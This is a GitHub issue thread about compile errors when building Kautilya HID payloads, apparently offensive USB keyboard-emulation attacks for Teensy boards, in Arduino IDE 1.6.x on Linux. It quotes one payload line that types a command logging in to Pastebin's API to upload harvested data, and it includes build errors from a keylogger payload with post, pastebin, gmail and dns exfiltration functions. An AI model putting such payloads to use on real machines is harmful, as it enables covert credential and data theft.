### ISSUE TITLE
Issue with Teensy 3 and Arduino IDE 1.6.x(1 & 3)

### ISSUE THREAD

**Issue by crazyquark** [samratashok/Kautilya#12]
Hello,

I tried several Windows payloads and the code to upload to pastebin seems to have an issue:
- lines like this
"    Keyboard.print("echo pht \"https://pastebin.com/api/api_login.php\" \"api_dev_key=$dev&api_user_name=$user&api_user_password=$pass\" >> %temp%\\");
    Keyboard.print(filename);
"
Always generate a compile error:
Arduino: 1.6.3 (Linux), TD: 1.22-beta4, Board: "Teensy 3.1, Keyboard + Mouse + Joystick, 96 MHz optimized (overclock), US English"

info.pde:320:20: warning: missing terminating " character [enabled by default]
info:320: error: missing terminating " character
[...]
info.pde: In function 'void pastebin(String)':
info:321: error: expected ')' before ';' token
expected ')' before ';' token

In short there is an issue with the escaping in that string but I can't figure it out.
If I comment out the Keyboard.print line it compiles and uploads.
I narrowed it down to the https:// part of the string - if I remove // it compiles but it won't work obviously.
For the life of me I can't tell what is wrong with that string.

**Comment by samratashok** [comment]
Thanks for reporting. I am unable to replicate it on a Teensy 3.0 board and Arduino on Windows.
Are you modifying something? Does your username and/or password for pastebin contains special characters? If yes, try with a simple one to see if it works.

**Comment by crazyquark** [comment]
Hello,

No special chars in my username or password.
I am however on Linux, not Windows...

**Comment by samratashok** [comment]
Successfully replicated! Looks like a bug in Arduino itself. Will update after more testing.
https://github.com/arduino/Arduino/issues/2762

**Comment by crazyquark** [comment]
Hello. What older version of Arduino should I use?
I tried with 1.5.0 as well.

**Comment by crazyquark** [comment]
Ah, OK, I will try the ones in that pull request. Thank you!

**Comment by samratashok** [comment]
I have not checked others but you can try 1.0.4. It is currently installed on my test machine and works fine.
http://arduino.cc/en/Main/OldSoftwareReleases

**Comment by crazyquark** [comment]
Yes, it works with Arduino IDE 1.0.6.
Thank you. I guess we'll wait for Arduino to fix this.

**Comment by ners11** [comment]
Now i using 1.0.6 and i have new error (( What i doing wrong? ((

keylogger.pde: In function ‘void setup()’:
keylogger:19: error: ‘Keyboard’ was not declared in this scope
keylogger:24: error: ‘Keyboard’ was not declared in this scope
keylogger:26: error: ‘Keyboard’ was not declared in this scope
keylogger.pde: In function ‘void wait_for_drivers(int)’:
keylogger:156: error: ‘Keyboard’ was not declared in this scope
keylogger:156: error: ‘KEY_CAPS_LOCK’ was not declared in this scope
keylogger:165: error: ‘Keyboard’ was not declared in this scope
keylogger:165: error: ‘KEY_CAPS_LOCK’ was not declared in this scope
keylogger.pde: In function ‘int ledkeys()’:
keylogger:175: error: ‘keyboard_leds’ was not declared in this scope
keylogger.pde: In function ‘bool cmd_admin(int, int)’:
keylogger:183: error: ‘Keyboard’ was not declared in this scope
keylogger:183: error: ‘MODIFIERKEY_RIGHT_GUI’ was not declared in this scope
keylogger:190: error: ‘MODIFIERKEY_CTRL’ was not declared in this scope
keylogger:192: error: ‘MODIFIERKEY_SHIFT’ was not declared in this scope
keylogger:194: error: ‘KEY_ENTER’ was not declared in this scope
keylogger.pde: In function ‘bool cmd(int, int, char*)’:
keylogger:212: error: ‘Keyboard’ was not declared in this scope
keylogger:212: error: ‘MODIFIERKEY_RIGHT_GUI’ was not declared in this scope
keylogger:213: error: ‘KEY_R’ was not declared in this scope
keylogger:222: error: ‘KEY_ENTER’ was not declared in this scope
keylogger.pde: In function ‘void make_sure_capslock_is_off()’:
keylogger:238: error: ‘Keyboard’ was not declared in this scope
keylogger:238: error: ‘KEY_CAPS_LOCK’ was not declared in this scope
keylogger.pde: In function ‘void create_click_capslock_win()’:
keylogger:252: error: ‘Keyboard’ was not declared in this scope
keylogger.pde: In function ‘void minimise_windows()’:
keylogger:278: error: ‘Keyboard’ was not declared in this scope
keylogger:278: error: ‘MODIFIERKEY_RIGHT_GUI’ was not declared in this scope
keylogger:279: error: ‘KEY_M’ was not declared in this scope
keylogger.pde: In function ‘void send_left_enter()’:
keylogger:302: error: ‘Keyboard’ was not declared in this scope
keylogger:302: error: ‘KEY_LEFT’ was not declared in this scope
keylogger:308: error: ‘KEY_ENTER’ was not declared in this scope
keylogger.pde: In function ‘void post(String)’:
keylogger:318: error: ‘Keyboard’ was not declared in this scope
keylogger.pde: In function ‘void compress_encode(String)’:
keylogger:346: error: ‘Keyboard’ was not declared in this scope
keylogger.pde: In function ‘void pastebin(String)’:
keylogger:372: error: ‘Keyboard’ was not declared in this scope
keylogger.pde: In function ‘void gmail(String, String)’:
keylogger:382: error: ‘Keyboard’ was not declared in this scope
keylogger.pde: In function ‘void hpost(String)’:
keylogger:429: error: ‘Keyboard’ was not declared in this scope
keylogger.pde: In function ‘void dns(String)’:
keylogger:437: error: ‘Keyboard’ was not declared in this scope

**Comment by ners11** [comment]
Thank you so much! I
